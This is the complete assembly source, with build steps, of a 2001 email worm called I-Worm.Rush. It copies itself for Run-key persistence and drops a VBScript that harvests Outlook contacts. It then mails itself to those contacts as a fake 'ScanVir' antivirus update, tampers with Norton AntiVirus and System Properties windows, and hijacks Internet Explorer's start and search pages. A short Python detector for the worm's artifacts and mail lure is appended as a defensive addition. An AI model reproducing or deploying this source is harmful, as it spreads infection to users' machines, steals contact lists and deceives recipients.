comment #
 Name    : I-Worm.Rush
 Author  : PetiK
 Date    : August 27th - September 2nd
 Size    : 5632 bytes (compiled with UPX tool)
 Action  : * Copy itself to WINDOWS\SYSTEM\Mail32.exe
           * Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run
             the value Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
           * On Wednesday it opens the cdrom
           * The 3rd it produces a sound
           * The 15th it alters "Search Page", "Start Page", and "Local Page" by
           * Creates %personal%\Read_Me.txt with a text
           * A vbs file searches all emails in the Outlook software and puts them
             in the MailBook.txt. The worm scans the file to find emails.
               Subject  : New Scan Virus...
               Body     : Hi man,
                          I send you the last update of ScanVir (v 2.5).
                          Look at the file attached.
                          Bye and have a nice day.
               Attached : ScanVir_25.exe
           * Scans title of windows :
               - Norton AntiVirus  => Norton Virus : W32.Norton.Worm@mm
               - System Properties => Minimize the window

 To build the worm:
   @echo off
   tasm32 /ml /m9 Rush
   tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
   upx -9 Rush.exe
   if exist *.obj del *.obj
   if exist *.map del *.map

 To delete the worm:
   del %windir%\system\Mail32.exe
   del %personal%\Read_Me.txt
   del %windir%\MailBook.txt
#

.586p
.model flat
.code
JUMPS

callx macro a
        extrn a:proc
        call a
endm

include useful.inc
include myinclude.inc

start:
        ;call hide_worm

; --- copy itself to <system dir>\Mail32.exe and register it under HKLM\...\Run ---
twin_worm:
        push 50
        mov esi,offset orig_worm
        push esi
        push 0
        callx GetModuleFileNameA

        mov edi,offset copy_worm
        push edi
        push 50
        push edi
        callx GetSystemDirectoryA
        add edi,eax
        mov eax,"iaM\"
        stosd
        mov eax,".23l"
        stosd
        mov eax,"exe"
        stosd
        pop edi

        push 0
        push edi
        push esi
        callx CopyFileA

        push 8
        push edi
        push 1
        @pushsz "Mail Outlook"
        @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
        push 80000002h
        callx SHSetValueA

; --- date-keyed payloads: Wednesday opens the cdrom, the 3rd beeps, the 15th alters IE pages ---
check_date:
        push offset SystemTime
        callx GetSystemTime
        cmp [SystemTime.wDayOfWeek],03h
        jne beep1

cdrom_open:
        push 00h
        push 00h
        push 00h
        @pushsz "open cdaudio"
        callx mciSendStringA
        push 00h
        push 00h
        push 00h
        @pushsz "set cdaudio door open"
        callx mciSendStringA

beep1:
        push offset SystemTime
        callx GetSystemTime
        cmp [SystemTime.wDay],03h
        jne special_folder
        mov counter,0
beep2:
        inc counter
        push 30h
        callx MessageBeep
        push 1
        callx Sleep
        cmp counter,5000
        jne beep2

; --- write Read_Me.txt into the "Personal" (CSIDL 5) folder ---
special_folder:
        push 00h
        push 05h
        push offset personal
        push 00h
        callx SHGetSpecialFolderPathA
        @pushsz "\Read_Me.txt"
        push offset personal
        callx lstrcat

txt_file:
        push 00h
        push 01h
        push 02h
        push 00h
        push 01h
        push 40000000h
        push offset personal
        callx CreateFileA
        mov [FileHdl],eax
        push 00h
        push offset octets
        push TXTSIZE
        push offset txtd
        push [FileHdl]
        callx WriteFile
        push [FileHdl]
        callx CloseHandle

; --- drop and run the address-harvesting script, then delete it ---
vbs_file:
        pushad
        push 00h
        push 80h
        push 02h
        push 00h
        push 01h
        push 40000000h
        @pushsz "C:\rushhour.vbs"
        callx CreateFileA
        xchg edi,eax
        push 00h
        push offset octets
        push VBSSIZE
        push offset vbsd
        push edi
        callx WriteFile
        push edi
        callx CloseHandle
        popad

        push 1
        @pushsz "wscript C:\rushhour.vbs"
        callx WinExec
        push 2000
        callx Sleep
        @pushsz "C:\rushhour.vbs"
        callx DeleteFileA

        push offset SystemTime
        callx GetSystemTime
        cmp [SystemTime.wDay],0Fh
        jne start_scan
        call internet_page

; --- build <windows dir>\MailBook.txt and scan it for addresses ---
start_scan:
        mov edi,offset mailbook
        push edi
        push 50
        push edi
        callx GetWindowsDirectoryA
        add edi,eax
        mov eax,"iaM\"
        stosd
        mov eax,"ooBl"
        stosd
        mov eax,"xt.k"
        stosd
        mov ax,"t"
        stosd
        xor eax,eax
        stosd

open_scan_file:
        pushad
        push 00h
        push 80h
        push 03h
        push 00h
        push 01h
        push 80000000h
        push offset mailbook
        callx CreateFileA
        inc eax
        je not_exist
        dec eax
        xchg eax,ebx
        xor eax,eax
        push eax
        push eax
        push eax
        push 2
        push eax
        push ebx
        callx CreateFileMappingA
        test eax,eax
        je F1
        xchg eax,ebp
        xor eax,eax
        push eax
        push eax
        push eax
        push 4
        push ebp
        callx MapViewOfFile
        test eax,eax
        je F2
        xchg eax,esi
        push 0
        push ebx
        callx GetFileSize
        cmp eax,3
        jbe F3

; one line per address; a line containing "@" is mailed to, "#" ends the file
scan_file:
        xor edx,edx
        mov edi,offset mail_addr
        push edi
p_c:
        lodsb
        cmp al," "
        je car_s
        cmp al,0dh
        je entr1
        cmp al,0ah
        je entr2
        cmp al,"#"
        je f_mail
        cmp al,"@"
        jne not_a
        inc edx
not_a:
        stosb
        jmp p_c
car_s:
        inc esi
        jmp p_c
entr1:
        xor al,al
        stosb
        pop edi
        test edx,edx
        je scan_file
        call send_mail
        jmp scan_file
entr2:
        xor al,al
        stosb
        pop edi
        jmp scan_file
f_mail:
F3:
        push esi
        callx UnmapViewOfFile
F2:
        push ebp
        callx CloseHandle
F1:
        push ebx
        callx CloseHandle
not_exist:
        popad

; --- poll window titles (Norton AntiVirus, System Properties, IE home page) ---
scan_window:
        mov counter,0
win1:
        inc counter
        cmp counter,1000000
        je end_w
        @pushsz "Norton AntiVirus"
        push 00h
        callx FindWindowA
        test eax,eax
        jz win2
        jmp change_nav
win2:
        @pushsz "System Properties"
        push 00h
        callx FindWindowA
        test eax,eax
        jz win3
        jmp show_window
win3:
        @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
        push 00h
        callx FindWindowA
        test eax,eax
        jz win1
        jmp display_message
change_nav:
        mov edi,eax
        @pushsz "Norton Virus : W32.Norton.Worm@mm"
        push edi
        callx SetWindowTextA
        jmp win1
show_window:
        mov edi,eax
        push 2
        push edi
        callx ShowWindow
        jmp win1
display_message:
        mov edi,eax
        push 10h
        @pushsz "Microsoft Internet Explorer"
        @pushsz "You don't have access to this page"
        push 00h
        callx MessageBoxA
        push 0
        push edi
        callx ShowWindow
        jmp win1
end_w:
        push 00h
        callx ExitProcess

; --- RegisterServiceProcess (Win9x) to hide from the task list; not called by default ---
hide_worm:
        pushad
        @pushsz "Kernel32.dll"
        callx GetModuleHandleA
        xchg eax,ecx
        jecxz end_hide_worm
        @pushsz "RegisterServiceProcess"
        push ecx
        callx GetProcAddress
        xchg eax,ecx
        jecxz end_hide_worm
        push 1
        push 0
        call ecx
end_hide_worm:
        popad
        ret

; --- set the three IE page values under HKCU\Software\Microsoft\Internet Explorer\Main ---
internet_page:
        pushad
        call diff_val
        db "Search Page",0
        db "Start Page",0
        db "Local Page",0
diff_val:
        pop esi
        push 3
        pop ecx
page_loop:
        push ecx
        push 32
        @pushsz "http://www.petik.fr.fm"
        push 1
        push esi
        @pushsz "Software\Microsoft\Internet Explorer\Main"
        push 80000001h
        callx SHSetValueA
        @endsz
        pop ecx
        loop page_loop
        popad
        ret

; --- send the Message structure below via Simple MAPI ---
send_mail:
        xor eax,eax
        push eax
        push eax
        push offset Message
        push eax
        push [MAPIHdl]
        callx MAPISendMail
        ret

.data
; === copy_worm ===
orig_worm   db 50 dup (0)
copy_worm   db 50 dup (0)
; === beep ===
counter     dd ?
; === special_folder ===
personal    db 70 dup (0)
octets      dd ?
FileHdl     dd ?
; === scan email ===
mailbook    db 50 dup (0)
mail_addr   db 128 dup (?)
MAPIHdl     dd 0
name_mail   db "ScanVir_25.exe",0
subject     db "New Scan Virus...",0
body        db "Hi man,",0dh,0ah
            db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
            db "Look at the file attached.",0dh,0ah,0dh,0ah
            db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom    db "Your Best Friend",0

; MapiMessage
Message     dd ?
            dd offset subject
            dd offset body
            dd ?
            dd ?
            dd ?
            dd 2
            dd offset MsgFrom
            dd 1
            dd offset MsgTo
            dd 1
            dd offset Attach
; MapiRecipDesc (originator)
MsgFrom     dd ?
            dd namefrom
            dd ?
            dd ?
            dd ?
; MapiRecipDesc (recipient)
MsgTo       dd ?
            dd 1
            dd offset mail_addr
            dd offset mail_addr
            dd ?
            dd ?
; MapiFileDesc (attachment = the worm's own image)
Attach      dd ?
            dd ?
            dd ?
            dd offset orig_worm
            dd offset name_mail
            dd ?

txtd:       db "Hi man,",0dh,0ah,0dh,0ah
            db "I don't want to destroy your computer.",0dh,0ah
            db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
            db 09h,09h,09h,"PetiK",00h
TXTSIZE     equ $-txtd

vbsd:       db 'On Error Resume Next',0dh,0ah
            db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
            db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
            db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
            db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
            db 'txt.Close',0dh,0ah
            db 'For Each M In chan.AddressLists',0dh,0ah
            db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
            db 'For O=1 To M.AddressEntries.Count',0dh,0ah
            db 'Set P=M.AddressEntries(O)',0dh,0ah
            db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
            db 'txt.WriteLine P.Address',0dh,0ah
            db 'txt.Close',0dh,0ah
            db 'Next',0dh,0ah
            db 'End If',0dh,0ah
            db 'Next',0dh,0ah
            db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
            db 'txt.WriteLine "#"',0dh,0ah
            db 'txt.Close',0dh,0ah
VBSSIZE     equ $-vbsd

signature   db "I-Worm.Rush",00h
origine     db "A worm made in France",00h
author      db "Written by PetiK - 2001",00h

end start
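Added defensive example, not part of PetiK's source: a small Python check that looks for the artifacts this listing leaves behind (the Run-key value, the dropped files, the hard-coded strings in the binary) and for the fixed mail lure at a gateway. The HostSnapshot layout and the demo snapshot are assumptions constructed for this example; the body strings are only visible once the UPX-packed file is unpacked.

```python
# Added defensive example (not from the I-Worm.Rush source). HostSnapshot is an
# assumed, constructed input shape for this demo; indicators come from the listing.
from dataclasses import dataclass, field

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = "Mail Outlook"
DROPPED_FILES = (r"%windir%\system\Mail32.exe", r"%windir%\MailBook.txt",
                 r"%personal%\Read_Me.txt", r"C:\rushhour.vbs")
LURE_SUBJECT = "New Scan Virus..."
LURE_ATTACHMENT = "ScanVir_25.exe"
# strings embedded in the (unpacked) worm image
BODY_STRINGS = ("I-Worm.Rush", "Written by PetiK - 2001", "rushhour.vbs", "MailBook.txt")


@dataclass
class HostSnapshot:
    run_values: dict = field(default_factory=dict)    # {(key, name): data}, keys lower-cased
    files: set = field(default_factory=set)           # paths present on the host, lower-cased
    file_strings: dict = field(default_factory=dict)  # {path: set of printable strings}


def scan_snapshot(snap: HostSnapshot) -> list:
    """Return one finding per matched artifact; an empty list means nothing matched."""
    findings = []
    data = snap.run_values.get((RUN_KEY.lower(), RUN_VALUE.lower()), "")
    if data.lower().endswith("mail32.exe"):
        findings.append(f"persistence: {RUN_KEY}\\{RUN_VALUE} = {data}")
    findings += [f"dropped file: {p}" for p in DROPPED_FILES if p.lower() in snap.files]
    for path, strings in snap.file_strings.items():
        hits = [s for s in BODY_STRINGS if s in strings]
        if len(hits) >= 2:  # two of the hard-coded strings together is a strong match
            findings.append(f"worm strings in {path}: {', '.join(hits)}")
    return findings


def is_lure_message(subject: str, attachments) -> bool:
    """Mail-gateway check for the worm's fixed lure: subject plus attachment name."""
    return subject.strip() == LURE_SUBJECT and any(
        a.lower() == LURE_ATTACHMENT.lower() for a in attachments)


def demo_snapshot() -> HostSnapshot:
    """Constructed infected host, mirroring what the listing writes to disk and registry."""
    return HostSnapshot(
        run_values={(RUN_KEY.lower(), "mail outlook"): r"C:\WINDOWS\SYSTEM\Mail32.exe"},
        files={r"%windir%\system\mail32.exe", r"%windir%\mailbook.txt"},
        file_strings={r"%windir%\system\mail32.exe": {"I-Worm.Rush", "rushhour.vbs"}})
```

The removal steps in the header (delete Mail32.exe, Read_Me.txt and MailBook.txt) leave the Run value in place, so a cleanup should also remove the `Mail Outlook` value that `scan_snapshot` reports.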